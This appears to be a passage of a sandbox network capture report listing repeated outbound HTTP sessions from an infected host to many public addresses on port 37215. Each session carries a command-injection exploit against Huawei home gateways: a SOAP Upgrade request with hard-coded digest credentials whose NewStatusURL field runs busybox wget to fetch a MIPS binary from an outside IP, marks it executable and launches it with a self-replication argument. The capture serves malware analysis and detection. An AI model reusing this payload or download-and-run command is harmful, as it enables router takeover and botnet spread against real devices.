                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1146192.168.2.2338132209.218.37.5937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529694080 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1147192.168.2.2342394203.175.65.21337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529695988 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1148192.168.2.2351788157.47.125.037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529752016 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1149192.168.2.234902867.242.17.10337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529768944 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1150192.168.2.2360342157.54.171.23337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529774904 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1151192.168.2.2338960197.212.175.737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529824018 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1152192.168.2.2343554206.14.4.22337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529913902 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1153192.168.2.2345556197.132.125.15937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529947042 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1154192.168.2.2336456172.5.111.5837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529953003 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1155192.168.2.2341522197.222.199.16437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.529979944 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
